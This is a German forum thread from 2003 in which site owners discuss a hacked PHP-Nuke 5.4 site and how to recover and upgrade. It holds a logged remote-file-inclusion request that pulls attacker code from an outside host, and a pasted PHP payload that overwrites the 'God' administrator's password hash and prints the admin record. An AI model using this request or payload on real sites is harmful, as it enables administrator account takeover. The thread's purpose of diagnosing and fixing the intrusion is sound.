Suche

[thomas_d]

bin mir nicht ganz sicher, aber nachdem seit einigen tagen bei jedem seitenaufruf von  http://www.uni4u.com ein pop-up von irgendeiner russischen site aufgeht und dabei auch gleich 8 cookies von irgendwelchen russischen sites auf meinem rechner abgelegt werden, habe ich die vermutung, dass sich da jemand unerlaubt zutritt verschafft hat...
nun um das wieder abzustellen, wäre es nett, wenn mir da jemand behilflich sein könnte mit einigen tipps, wo ich denn suchen könnte/sollte um dieses äußerst lästige anhängsel wieder loszuwerden...

danke schon mal...

achja, das ganz läuft unter nuke 5.4...

[oliver]

schau mal auf www.zudteam.org/hacked.htm die haben mich auch gehackt. meine seite ist fhost.de

[jubilee]

Hallo !
PHP-Nuke 5.4 --------> UPDATEN !!!
Mindestens nach 5.5, VKP5.5, VKPMxxx, 5.6 etc....
Aber möglichst auch nicht nach 6.0.
Da sind auch einige sicherheitslecks drin.
MfG
jubilee

[oliver]

meinste ich sollte auch ein anderes nehmen. hab 6.0

[jubilee]

Hmmm.
Würde mich auf jeden Fall über die Sicherheitslecks informieren.
Guter Anlaufpunkt dafür ist :
http://www.kritikerseiten.de
Weiß aber nicht, ob es schon Fixes für die Probs gibt.
MfG
jubilee
 

Die Fixes gibt es schon:  //phpnuke-service.de/modules.php?name=Downloads&d_op=viewdownload&cid=4

[oliver]

morgen leute

habe gestern noch sämtliche fixes installiert.

[thomas_d]

also, eines hab ich schon gefunden:
im admin block wurde eine url mitgeladen...
und dann hab ich zum Glück das Tracking-Modul installiert und das mal durchforstet und da bin ich auf folgende Funktion gestossen:

213.85.117.138   index.php?file=http://vzlomer.boom.ru/admin 2.txt
 
kann mir da jemand sagen, was damit bewirkt wird?

und vor allem, wie ich in zukunft solche angriffe (halbwegs) in den griff bekommen kann...

[oliver]

da liest einer deine datenbank aus denk ich mal. habe mal den link http://vzlomer.boom.ru/admin2.txt ausprobiert. sieht wie dein verschlüsseltes admin passwort aus.

ERGEBNIS:
 
$dbi=@mysql_connect($dbhost, $dbuname, $dbpass);
mysql_select_db($db);
$query="update ".$prefix."_authors set pwd='dac4ee0311e1eb0ea46ee553bf4b2a56' where name='God'";
$result=mysql_query($query) or die ("error");
$query="select * from ".$prefix."_authors where name='God'";
$result=mysql_query($query) or die ("error");
$row_count=mysql_num_rows($result);
$row=mysql_fetch_array($result);
print ("$row[aid] \n\n");
print ("$row[pwd] \n\n");




[Editiert am 16/1/2003 von oliver]

[jubilee]

Was da genau abläuft kann man am Ergebnis nur ahnen.
Das hier  

$query="update ".$prefix."_authors set pwd='dac4ee0311e1eb0ea46ee553bf4b2a56' where name='God'";

könnte auch bedeuten es wird versucht ein neues Passwort für den God-Admin zu setzen.
Abwehren kannst Du das, indem Du von  dem unseeligen Nuke 5.4 auf eine neuere Version updatest.
Schau einmal, ob Du evt. schon einen Admin in der Datenbank
_authors hast, den Du nicht angelegt hast. Könnte sein, das der Hacker schon erfolg gehabt hat
MfG
jubilee

[Editiert am 16/1/2003 von SiteAdmin jubilee]

[jubilee]

Ich nochmal !
Hab mir das nochmal ganz durchgesehen.
1. Es wird versucht für den Admin mit Namen God ein Kennwort zu setzen.
2. Wenn das klappt, gehts weiter, sonst wird das Script beendet.
3. Alle informationen der Admin mit Namre God werden geholt.
4. Wenn das klappt -->weiter sonst ende des Script.
5. Die Informationen werden ausgegeben.

MfG
jubilee


[Editiert am 16/1/2003 von SiteAdmin jubilee]

[jubilee]

@thomas_d:
Wenn du noch den Nuke-Filemanager verwendest, denn deaktivier das
Ding. Ich glaube mich zu erinnern, das solcherart Angriffe darüber laufen.
MfG
jubilee  

[Andi]

Lustig dabei ist natürlich, wenn der Typ damit wirklich reinkommt....
Er könnte sich noch viel interessantere Sachen anzeigen lassen.
Schreibe ich hier jetzt aber nicht, nicht dass noch mehr auf den blöden Gedanken kommen

[DarkBoy]

Der BUG und der Trick ist eigentlich schon so alt , das er nen bart hat!
Die einfachste Methode ist auf neuere Version wie hubilee schon sagte. Filemanger würde ich streichen, damit sind noch  ganz andere Sachen möglich  Sicherheitsloch des Herren das teil.

Andi hat da uch schon Recht, es geht noch einiges mehr wenn man ds nuke Original nimmt. Aber logisch das wir hier keine Tips geben nicht mal um die kleinen Löcher zu flicken, sonst stossen wir ja unendlch viele drauf.

Nimm ein neueres Nuke und du wirst Ruhe haben.